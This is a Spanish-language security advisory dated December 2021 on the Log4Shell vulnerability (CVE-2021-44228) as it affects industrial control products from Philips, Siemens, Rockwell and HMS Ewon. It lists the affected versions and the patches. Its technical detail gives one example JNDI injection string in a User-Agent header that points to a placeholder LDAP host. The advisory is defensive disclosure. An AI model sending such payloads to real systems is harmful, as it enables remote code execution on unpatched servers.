Vulnerabilidad Log4Shell afecta a Sistemas de Control Industrial

Fecha de publicación: 14/12/2021

Importancia:
Crítica

Recursos afectados:

La vulnerabilidad conocida como Log4Shell, detectada en la librería Log4j2 mantenida por Apache Software Foundation, desde la versión 2.0-beta9 hasta la versión 2.14.1, y descrita en nuestro aviso técnico, también ha afectado a fabricantes de Sistemas de Control Industrial.

Entre los fabricantes SCI que integran esta librería y han informado de la vulnerabilidad en sus productos están:

• Philips:
  • IntelliSpace Precision Medicine (productos sólo de software con sistemas operativos propiedad del cliente),
  • RIS Clinic,
  • IntelliBridge Enterprise (B.13-B.15) (productos sólo de software con sistemas operativos propiedad del cliente),
  • VuePACS,
  • ISPACS (el entorno de hosting de Philips está evaluando la solución proporcionada por VMware y está en proceso de implementación para los clientes de servicios gestionados).
• Siemens:
  • E-Car OC Cloud Application, versiones anteriores a 2021-12-13;
  • EnergyIP Prepay, versiones 3.7 y 3.8;
  • todas las versiones de:
    • Industrial Edge Management App (IEM-App);
    • Industrial Edge Management OS (IEM-OS);
    • Industrial Edge Manangement Hub;
    • LOGO! Soft Comfort;
    • Mendix Applications;
    • Siveillance Control Pro;
    • Siveillance Vantage.
  • Mindsphere Cloud Application, versiones anteriores a 2021-12-11;
  • Operation Scheduler, versión 1.1.3 y superiores;
  • SIGUARD DSA, versiones 4.2, 4.3 y 4.4;
  • SIMATIC WinCC 7.4, versiones anteriores a 7.4 SP1;
  • Siveillance Command, versión 4.16.2.1 y superiores.
• Rockwell Automation:
  • Plex (A Rockwell Automation Company) Industrial IoT;
  • Fiix (A Rockwell Automation Company) CMMS core V5.
• HMS Ewon Talk2M.

Además, cabe destacar la importancia de analizar y revisar la afectación de otros productos y servicios de ámbito interno.

Descripción:

Chen Zhaojun, investigador de Alibaba Cloud Security Team, ha descubierto una vulnerabilidad 0day crítica, que se ha denominado Log4Shell, que podría ser explotada por un atacante remoto no autenticado para ejecutar código arbitrario (RCE), y que varios fabricantes de SCI han detectado en algunos de sus productos.

Solución:

• Actualizar Apache Log4j a la versión 2.16.0. Como medidas de mitigación, aplicar las que aparecen listadas en el apartado Solución de nuestro aviso técnico.
• Para los productos de Siemens, actualizar a las versiones indicadas en el apartada AFFECTED PRODUCTS AND SOLUTION de su aviso.
• Para los productos de Rockwell Automation:
  • Plex Industrial IoT: no es necesario que el usuario actúe, ya que el producto ya tiene aplicada la mitigación y ya no está afectado. Además, el 13/12/21 se publicará un parche para actualizar Log4j2 a la versión 2.15.
  • Fiix CMMS core V5: no es necesaria ninguna acción por parte del usuario, ya que el producto se ha actualizado a la versión 2.15 de Log4j2.
• HMS Ewon ha aplicado los parches necesarios en su infraestructura cloud Talk2M.

Detalle:

La vulnerabilidad se origina de la forma en que los mensajes de registro son gestionados por el procesador Log4j. Si un atacante envía un mensaje especialmente diseñado:

User-Agent: ${jndi:ldap://<host>:<port>/<path>}

Podría resultar en la carga de una clase de código externo o la búsqueda de mensajes y la ejecución de ese código, lo que llevaría a una RCE. Se ha asignado el identificador CVE-2021-44228 para esta vulnerabilidad.

Debido a que algunas funciones de Apache Log4j realizan análisis recursivos, los atacantes podrían diseñar peticiones maliciosas para desencadenar vulnerabilidades de ejecución remota de código.

IMPORTANTE: esta vulnerabilidad podría estar explotándose de manera activa.

Etiquetas:
0day, Actualización, Apache, Infraestructuras críticas, Java, Sanidad, Siemens, Vulnerabilidad